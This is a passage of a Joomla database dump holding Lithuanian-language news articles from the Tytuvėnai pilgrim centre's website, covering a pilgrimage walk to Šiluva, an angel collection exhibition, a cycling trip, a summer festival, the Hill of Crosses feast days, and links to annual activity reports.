"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(246,334,'Vilties ir padėkos žygis','vilties-ir-padekos-zygis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jau 25 metai kuomet prieš didžiuosius Šilinių atlaidus, paskutinį rugpjūčio sekmadienį vyksta Vilties ir Padėkos Dievo Motinai už atgautą laisvę eisena.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/vilties_zygis/{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Ir šiais metais piligrimai rinkosi Tutyvėnuose. Žygiui tradiciškai vadovavo Šiaulių vyskupas Eugenijus Bartulis. Kaip ir kasmet kartu buvo tarptautinės katalikiškos asociacijos Tradicija, Šeima, Nuosavybė (Tradition, Family, Propety - TPF) delegacija ir Baltarusijos skautai, vadovaujami Aleksandro Strelcovo. Kelyje iš Tytuvėnų į Šiluvos šventovę žmonės giedojo, kalbėjo rožinį, meldėsi.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Malda kelionėje – sena piligrimų tradicija, ja išmeldžiamos malonės taip reikalingos sunkioje, nerimastingoje mūsų laikų  kasdienybėje.<br /><br /></span></p>',1,0,0,44,'2015-09-06 20:00:28',135,'','2015-09-06 20:00:40',135,0,'0000-00-00 00:00:00','2015-09-06 20:00:28','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vilties_zygis\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,130,'','',1,3645,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(252,340,'Paroda \"Iš R. E. Teresiūtės angelų kolekcijos\"','paroda-is-r-e-teresiutes-angelu-kolekcijos','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dar iki Trijų Karalių šventės Tytuvėnų Bernardinų vienuolyno celėse galite apžiūrėti Reginos Editos Teresiūtės angelų kolekciją.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/teresiutes_paroda/pic{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">„Angelas - būtybė mistinė, tačiau kiekvienas jai suteikiame tauriausius bruožus. Neveltui sakoma – “Šviesus kaip angelas”, ”Tu mano angelas”, “Miega kaip angelas”,angeliško grožio.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Reginos Editos Teresiūtės kolekcijoje daugiau nei keturi šimtai angelų: dideli ir mažučiukai, iš stiklo, medžio, molio, net iš popieriaus ir vilnos. Jie lyriški, susimąstę, juokingi, ”saldūs”, balti baltučiai, bet yra ir… juodų. O pagal amžių, yra ir šimtamečių.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kiekvienas angelas turi savo istoriją, daugelis jų parsivežti iš piligriminių kelionių po Šventąją žemę, Meksiką ir Europos šventoves. Įdomūs ir Lietuvos drožėjų darbai. Kolekcijoje yra ir brolio Adolfo Teresiaus liaudies meistro, drožėjo, skulptūrėlių. Sesuo Edita domisi dvasiniu pasauliu, Dievo mums skirtais globėjais, kurie pakužda teisingus sprendimus, kovoja kartu su mumis, stiprina kai būname silpni ir džiaugiasi kartu su mumis.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>Regina Edita Teresiūtė</strong> kilusi iš Kelmės. Anksti apsisprendė pasirinkti pašvęstojo gyvenimo kelią, Eucharistinio Jėzaus Kongregacijos sesuo vienuolė. Prisidėjo sovietmečiu leidžiant “Katalikų bažnyčios kroniką”,dalyvavo organizuojant eisenas į Šiluvą.  Dabar gyvenana ir apaštalauja Šiluvoje.<br /><br /><br /><br style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\" /></span></p>',1,0,0,44,'2015-12-31 07:47:53',135,'','2015-12-31 07:48:23',135,0,'0000-00-00 00:00:00','2015-12-31 07:47:53','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/teresiutes_paroda\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,124,'','',1,3463,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(238,326,'Dviračių žygis ,,Tytuvėnai-2015’’','dviraciu-zygis-tytuvenai-2015-birzelio-6-d-10-30-val','','<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica,Arial,\'lucida grande\',tahoma,verdana,arial,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; display: inline ! important; float: none; background-color: #ffffff;\">Birželio 6 d. 10.30 val.</span></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Treti metai vasaros sezono pradžią pažymine  dviračių žygiu aplink Tytuvėnus. Šiemet  Jūsų laukia pilna įspūdžių  25 km. kelionė dviračiais, kuri prasidės nuo Tytuvėnų vienuolyno ir tęsis iki ,,Akmenų rūžos‘‘. <br /></span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Aplankysime Tytuvėnų dvarą, Gauštvinio ežerą, ,,Akmenų rūžą‘‘. Laukia atrakcijos, žaidimai, košė ir aišku apdovanojimai Tytuvos šventės metu. Dalyvio mokestis: 2 €.</span></span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Būtina išankstinė registracija į dviračių žygį ,,Tytuvėnai-2015‘‘. Galite registruotis paskambinę į VšĮ ,,Tytuvėnų piligrimų centras‘‘ tel. 8 427 562 23, 8 615 584 86. </span></span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/dviraciu_zygis/zygis.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p> </p>',1,0,0,44,'2015-05-28 07:38:24',135,'','2015-05-28 07:40:24',135,0,'0000-00-00 00:00:00','2015-05-28 07:38:24','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dviraciu_zygis\\/dviraciu_zygis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,135,'','',1,4259,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(239,327,'Tytuvėnų vasaros festivalis','xii-tarptautinio-tytuvenu-vasaros-festivalio-programa','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">XII tarptautinis Tytuvėnų vasaros festivalis. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2015 m. birželio 21 d. - rugpjūčio 22 d.</span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/tvf/tvf2015.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p> </p>',1,0,0,44,'2015-06-07 20:22:53',135,'','2015-06-14 09:54:41',135,0,'0000-00-00 00:00:00','2015-06-07 20:22:53','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tvf\\/tvf2015logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,134,'','',1,4329,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(240,328,'Kryžių kalno atlaidai','kryziu-kalno-atlaidai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2015 PAŠVĘSTO GYVENIMO METŲ<br />KRYŽIŲ KALNO ATLAIDAI  LIEPOS 25-26 DIENOMIS</span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/kryziu_kalno_atlaidai/kryziu_kalno_atlaidai1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p> </p>',1,0,0,44,'2015-06-23 11:25:47',135,'','0000-00-00 00:00:00',0,135,'2015-06-23 11:25:47','2015-06-23 11:25:47','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kryziu_kalno_atlaidai\\/kryziu_kalno_atlaidai_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,133,'','',1,3618,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(241,329,'Veiklos ataskaitos','veiklos-ataskaitos','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf\" target=\"_blank\">2013 m. veiklos ataskaita </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf\" target=\"_blank\">2014 m. veiklos ataskaita </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf\" target=\"_blank\">2015 m. veiklos ataskaita </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf\" target=\"_blank\">2015 m. balansas ir veiklos rezultatai </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf\" target=\"_blank\">2016 m. veiklos ataskaita </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf\" target=\"_blank\">2016 m. balansas ir veiklos rezultatai </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf\" target=\"_blank\">2019 m. veiklos ataskaita </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf\" target=\"_blank\">2020 m. veiklos ataskaita </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2021_m_veiklos_ataskaita.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/2021_m_veiklos_ataskaita.pdf\" target=\"_blank\">2021 m. veiklos ataskaita </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/veiklos_ataskaita_2022.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/veiklos_ataskaita_2022.pdf\" target=\"_blank\">2022 m. veiklos ataskaita </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/veiklos_ataskaita_2023.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/veiklos_ataskaitos/veiklos_ataskaita_2023.pdf\" target=\"_blank\">2023 m. veiklos ataskaita </a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,31,'2015-06-28 17:43:16',135,'','2024-06-07 19:28:22',135,135,'2024-06-07 19:28:22','2015-06-28 17:43:16','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',11,0,11,'','',1,7316,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(242,330,'Tytuvėnų vasaros festivalis','xii-tarptautinio-tytuvenu-vasaros-festivalio-programa-2','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">XII tarptautinis Tytuvėnų vasaros festivalis. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2015 m. birželio 21 d. - rugpjūčio 22 d.</span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/tvf/tvf2015.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p> </p>',1,0,0,56,'2015-06-07 20:22:53',135,'','2017-06-07 09:50:48',135,0,'0000-00-00 00:00:00','2015-06-07 20:22:53','0000-00-00 